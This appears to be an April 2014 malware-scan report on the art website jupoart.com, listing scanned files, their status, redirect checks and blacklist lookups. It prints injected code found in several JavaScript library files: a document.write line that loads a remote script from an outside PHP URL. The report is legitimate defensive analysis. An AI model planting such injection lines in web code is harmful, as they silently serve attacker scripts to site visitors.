Scanned pages/files
Request | Server response | Status |
http://jupoart.com/ | 200 OK Content-Length: 9879 Content-Type: text/html | clean |
http://jupoart.com/js/jquery-1.10.2.min.js | 200 OK Content-Length: 93498 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.giannimara.it/r7cXGfvj.php?id=25782898"></script>'); | ||
http://jupoart.com/js/lightbox-2.6.min.js | 200 OK Content-Length: 7780 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.giannimara.it/r7cXGfvj.php?id=25782900"></script>'); | ||
http://jupoart.com/js/jquery.min.js | 200 OK Content-Length: 93498 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.giannimara.it/r7cXGfvj.php?id=25782899"></script>'); | ||
http://jupoart.com/js/skel.min.js | 200 OK Content-Length: 21830 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var skel=function(){var a={config:{prefix:null,preloadStyleSheets:!1,pollOnce:!1,resetCSS:!1,normalizeCSS:!1,boxModel:null,useOrientation:!1,useRTL:!1,pollOnLock:!1,usePerpetualLock:!0,useDomainLock:!0,containers:960,grid:{collapse:!1,gutters:40},breakpoints:{all:{range:"*",hasStyleSheet:!1}},events:{}},isConfigured:!1,isInit:!1,lockState:null,stateId:"",me:null,breakpoints:[],breakpointList:[],events:[],plugins:{},cache:{elements:{},states:{}},locations:{html:null,head:null,body:null},vars:{},l !0;a.isConfigured&&a.init()}};a.preInit();return a}(); Antivirus reports:
| ||
http://jupoart.com/js/init.js | 200 OK Content-Length: 9027 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://www.giannimara.it/r7cXGfvj.php?id=25782897"></script>'); | ||
http://jupoart.com/paints/img1.JPG | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 06 Apr 2014 16:41:20 GMT Location: http://jupoart.com/paints/img1.jpg Server: Apache Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 | clean |
http://jupoart.com/paints/img1.jpg | 200 OK Content-Length: 300975 Content-Type: image/jpeg | clean |
http://jupoart.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://jupoart.com/paints/img2.JPG | 200 OK Content-Length: 300192 Content-Type: image/jpeg | clean |
http://jupoart.com/paints/img3.JPG | 200 OK Content-Length: 300975 Content-Type: image/jpeg | clean |
http://jupoart.com/paints/img4.JPG | 200 OK Content-Length: 302423 Content-Type: image/jpeg | clean |
http://jupoart.com/paints/img5.JPG | 200 OK Content-Length: 300975 Content-Type: image/jpeg | clean |
http://jupoart.com/paints/img6.JPG | 200 OK Content-Length: 300975 Content-Type: image/jpeg | clean |
http://jupoart.com/paints/img7.JPG | 200 OK Content-Length: 300648 Content-Type: image/jpeg | clean |
http://jupoart.com/paints/img8.JPG | 200 OK Content-Length: 300736 Content-Type: image/jpeg | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jupoart.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Apr 2014 16:41:14 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 9879
Content-Type: text/html
Last-Modified: Sat, 05 Apr 2014 23:21:17 GMT
...9879 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jupoart.com
Referer: http://www.google.com/search?q=jupoart.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jupoart.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jupoart.com/
Result: jupoart.com is not infected or malware details are not published yet.